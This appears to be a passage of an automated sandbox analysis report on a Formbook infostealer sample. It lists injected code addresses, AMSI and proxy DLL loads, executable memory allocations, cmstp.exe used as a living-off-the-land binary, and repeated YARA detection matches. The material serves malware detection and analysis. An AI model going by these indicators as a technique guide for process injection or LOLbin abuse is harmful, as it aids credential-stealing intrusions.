Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0208C7BC 6_2_0208C7BC
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020B57C3 6_2_020B57C3
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020BD47D 6_2_020BD47D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02091489 6_2_02091489
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020B5485 6_2_020B5485
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0208351F 6_2_0208351F
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020C6540 6_2_020C6540
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0209C5F0 6_2_0209C5F0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02133A83 6_2_02133A83
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020A7B00 6_2_020A7B00
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0212CBA4 6_2_0212CBA4
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0210DBDA 6_2_0210DBDA
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0207FBD7 6_2_0207FBD7
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0208C85C 6_2_0208C85C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020A286D 6_2_020A286D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0211F8EE 6_2_0211F8EE
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02105955 6_2_02105955
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0212098E 6_2_0212098E
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020829B2 6_2_020829B2
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020969FE 6_2_020969FE
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020B2E2F 6_2_020B2E2F
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0209EE4C 6_2_0209EE4C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02090F3F 6_2_02090F3F
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020ADF7C 6_2_020ADF7C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020B0D3B 6_2_020B0D3B
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0208CD5B 6_2_0208CD5B
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0211FDDD 6_2_0211FDDD
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00296F06 6_2_00296F06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_002908FB 6_2_002908FB
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00297D02 6_2_00297D02
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00290902 6_2_00290902
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_002932FF 6_2_002932FF
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00293302 6_2_00293302
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00291362 6_2_00291362
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00291359 6_2_00291359
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_002957B2 6_2_002957B2
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00556F06 6_2_00556F06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_005532FF 6_2_005532FF
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_005508FB 6_2_005508FB
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00551359 6_2_00551359
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00551362 6_2_00551362
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00557D02 6_2_00557D02
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00550902 6_2_00550902
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00553302 6_2_00553302
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_005557B2 6_2_005557B2
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_0044629C 8_2_0044629C
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_0044B47C 8_2_0044B47C
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_0044629C 11_2_0044629C
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_0044B47C 11_2_0044B47C
PE file contains strange resources
Source: vbc[1].exe.2.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Esfjmbxd.exe.4.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: amsiproxy.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: amsiproxy.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsiproxy.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsiproxy.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsiproxy.dll Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsiproxy.dll Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 72480000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 72480000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 72480000 page no access Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 72480000 page read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 72481000 page read and write Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 72480000 page execute and read and write Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 72480000 page execute and read and write Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 72480000 page no access Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 72480000 page read and write Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 72481000 page read and write Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 72480000 page execute and read and write Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 72480000 page execute and read and write Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 72480000 page no access Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 72480000 page read and write Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 72481000 page read and write Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Uses a Windows Living Off The Land Binaries (LOL bins)
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Yara signature match
Source: 18.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.72480000.7.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.72480000.7.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.634841930.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.634841930.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.498505335.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498480365.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565073378.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565679840.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498627216.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588564983.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000002.608536572.000000000481C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.608536572.000000000481C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000003.588126227.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000E.00000002.620328507.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.620328507.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.498862779.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588811679.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498678238.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498733473.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498702228.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.566149960.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.499081550.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588856933.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565115877.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.499010523.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565865181.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
